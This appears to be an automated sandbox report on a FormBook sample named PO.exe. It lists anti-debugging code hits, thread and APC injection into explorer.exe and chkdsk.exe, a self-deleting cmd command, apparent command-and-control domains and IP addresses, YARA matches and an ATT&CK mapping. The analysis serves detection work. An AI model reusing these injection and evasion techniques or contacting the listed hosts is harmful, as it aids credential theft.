          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A12AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A12ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A24A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A24A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A03A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A9B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A9B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A2927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A74257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A14BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A14BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A14BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A9D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A12397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A0DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A13B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A13B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A66CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A66CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A66CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A66C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A66C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A66C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A66C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A0746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A7C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A7C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A135A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A11DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A11DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A11DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A12581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A12581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A12581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A12581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A98DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A66DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A66DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A66DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A66DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A66DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A66DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009FD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009FD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A6A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A14D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A14D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A14D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A0C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A0C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A23D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A63540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A07D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A646A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A7FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A116E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A28EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A9FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A136CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A9FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A18E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A0AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A0AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A0AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A0AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A0AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A67794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A67794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A67794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A237F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A0F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A7FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A7FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009FEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009FFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 199.247.6.20 80
          Source: C:\Windows\explorer.exeDomain query: www.ayescarrental.com
          Source: C:\Windows\explorer.exeDomain query: www.riceandginger.com
          Source: C:\Windows\explorer.exeNetwork Connect: 162.241.24.122 80
          Source: C:\Windows\explorer.exeDomain query: www.deerokoj.com
          Contains functionality to prevent local Windows debugging
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_73CA1000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\PO.exeSection loaded: unknown target: C:\Users\user\Desktop\PO.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PO.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PO.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PO.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\PO.exeThread register set: target process: 3472
          Source: C:\Windows\SysWOW64\chkdsk.exeThread register set: target process: 3472
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\PO.exeThread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\Desktop\PO.exeProcess created: C:\Users\user\Desktop\PO.exe 'C:\Users\user\Desktop\PO.exe'
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO.exe'
          Source: explorer.exe, 00000002.00000002.496500751.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 00000008.00000002.498987937.0000000006050000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000002.496500751.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 00000008.00000002.498987937.0000000006050000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000002.00000002.496500751.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 00000008.00000002.498987937.0000000006050000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000002.00000002.495880776.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000002.00000002.496500751.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 00000008.00000002.498987937.0000000006050000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000002.00000002.496500751.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 00000008.00000002.498987937.0000000006050000.00000002.00000001.sdmpBinary or memory string: Progmanlock

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara matchFile source: 00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.495059747.0000000000200000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.281955301.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.281979783.0000000000D20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.235598141.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara matchFile source: 00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.495059747.0000000000200000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.281955301.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.281979783.0000000000D20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.235598141.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Native API1 | Path Interception | Process Injection512 | Rootkit1 | Credential API Hooking1 | Security Software Discovery141 | Remote Services | Credential API Hooking1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot1
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion3 | LSASS Memory | Virtualization/Sandbox Evasion3 | Remote Desktop Protocol | Archive Collected Data1 | Exfiltration Over Bluetooth | Ingress Tool Transfer1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection512 | Security Account Manager | Process Discovery2 | SMB/Windows Admin Shares | Clipboard Data1 | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information1 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol12 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information3 | LSA Secrets | File and Directory Discovery2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing11 | Cached Domain Credentials | System Information Discovery12 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features

          Behavior Graph

          Behavior Graph ID: 383909   Sample: PO.exe   Startdate: 08/04/2021   Architecture: WINDOWS   Score: 100

          Process tree, domains and signatures recovered from the rendered graph:

          Sample start
            Domains: www.665asilo.com, tourbuzz.net, tour.tourbuzz.net
            Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 4 other signatures
            -> PO.exe (started)
                 Dropped file: C:\Users\user\AppData\Local\...\gif000d.dll, PE32
                 Signatures: Detected unpacking (changes PE section rights); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; Contains functionality to prevent local Windows debugging
                 -> PO.exe (started)
                      Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Queues an APC in another process (thread injection)
                      -> explorer.exe (injected)
                           Domains/IPs: www.deerokoj.com; riceandginger.com 162.241.24.122, 49727, 80 UNIFIEDLAYER-AS-1US United States; 3 other IPs or domains
                           Signatures: System process connects to network (likely due to code injection or exploit)
                           -> chkdsk.exe (started)
                                Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                                -> cmd.exe (started)
                                     -> conhost.exe (started)


